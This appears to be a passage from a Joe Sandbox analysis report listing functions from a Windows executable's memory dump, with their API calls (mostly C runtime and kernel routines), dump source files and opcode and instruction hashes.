                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                    • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                    • Instruction ID: a87388c7a6405523a930bfd1fdb3c26e76c1af53e27c5b79a6f9c327825b7dbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88311721A0924242FA75AB7495113FD1381EF517C8F4604BCEA4ECF2D7DE6DAD45C781
                                                                                                                                                                                                                                                    Function 00007FF69F3F8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                    • Instruction ID: 884fdfd369f77ec2f841d7a38b4e9ea261aa4b13cb133b56e7c9b6fa48af330f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D06710B1870686FBBC3B70595917913119F68B41B1615BCE84ACA393CD6CA81D5394
                                                                                                                                                                                                                                                    Function 00007FF69F3EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                    • Instruction ID: e9d8e8dea5dc8616c4880770c68fd197c435fba2716c3286984c4bcda1bdeda0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551F962B1968247FB789E36940067A6391FF44BB8F164778DD6D8B7D5CEBCD8008A80
                                                                                                                                                                                                                                                    Function 00007FF69F3FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                    • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                    • Instruction ID: e6dcf06491b099a410b8db372d7c1bb8a79114ecf14403ab4ca7f307781a1cd8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A711C4A1608A8281EB608B25F5041697761EB44FF4F694375EE7D8BBEACE7CD0508780
                                                                                                                                                                                                                                                    Function 00007FF69F3F9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                    • Instruction ID: 634baafad6fb877bd27352064b2a3d319e9ba0a07715aa5d925fe3ea1eb8cac2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E08C10F0964243FF786BF2E84407923A1DFA8B40B1640B8C90DCB292EE3C68959390
                                                                                                                                                                                                                                                    Function 00007FF69F3F9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF69F3F9CE5,?,?,00000000,00007FF69F3F9D9A), ref: 00007FF69F3F9ED6
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F3F9CE5,?,?,00000000,00007FF69F3F9D9A), ref: 00007FF69F3F9EE0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                    • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                    • Instruction ID: 429af31af993cef44f9dfc2166792ddfa572b0aff3e815c4cec4404be2b8aad7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF219211B1964241FEF49761A9803792391DF94BA0F1642BDD92ECB3D6CE6CA441A380
                                                                                                                                                                                                                                                    Function 00007FF69F3FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                    • Instruction ID: bbfd5a992f77d4e031c4322b500f828428973ea82f71b0ec4adb89331316ac7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B741E17290820287FAB49B19E54127D7BA0EB56B84F160179DA8ECB6D1CF3CE502D790
                                                                                                                                                                                                                                                    Function 00007FF69F3E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                    • Opcode ID: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                                                                                                                                                                                                                    • Instruction ID: d90be4ec4856d889ecc234803bccee6edfb2f98d100d34012eacf75df4b36528
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C921B611B1825147FA309A16A5083FA9741FF45BD4F8944B8ED2C8F786CE7DE851C340
                                                                                                                                                                                                                                                    Function 00007FF69F3FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                    • Instruction ID: 0ecc8cc3e44a42ffdbb66cfe8a6f0cbcbadbabc0d264f15ff1695200d618d1b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A731A521A2864146FBA15B55D44137D3750EB50BB1F5301BAE92DCB3D2CF7CE451A790
                                                                                                                                                                                                                                                    Function 00007FF69F3F8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                                    • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                    • Instruction ID: 51acdb7cecce287c28ef20ec8f6b01616ca42bef74e42f54a95387b580aa3a05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE218E32A157068AFBA89F64C4402EC33A0FB44718F55467AD62C8AAD5EF3CD554DB90
                                                                                                                                                                                                                                                    Function 00007FF69F3F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                    • Instruction ID: eec43291f8774ef66e9a97d3cf983ed629efa433201423e345f569514fa6e4e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA118421A1D64182FAF09F51D80017EA3A4EF95B80F564179EA4CDFA96CF3CE440A780
                                                                                                                                                                                                                                                    Function 00007FF69F405664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                    • Instruction ID: 37da204fbde32c25712b890bf3a1b8a30897474bd7b55234f80cb316e4168b4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21A73261868187EB718F18E44077977A0EB94F94F294234EA5DC76EADF7DD400CB00
                                                                                                                                                                                                                                                    Function 00007FF69F3EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                    • Instruction ID: ceaf479d55ba963fd59359756bd732a337970033ad7a6d7539e7d6e0984bede8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D012B25A1874241FA24DF63990007DA794FF55FE0F4A4279DE6C8BBD6DE7CE8128340
                                                                                                                                                                                                                                                    Function 00007FF69F3F720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                                    • Instruction ID: c0d92bd0cdedb14e6ba71bf89f889a88d629b70f0b6a666c4e1c8f720612c176
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D018C20E0D68251FEF4ABA56A411793390EF45B94F1602BDFA7CCA6D7DE2DE441A3C0
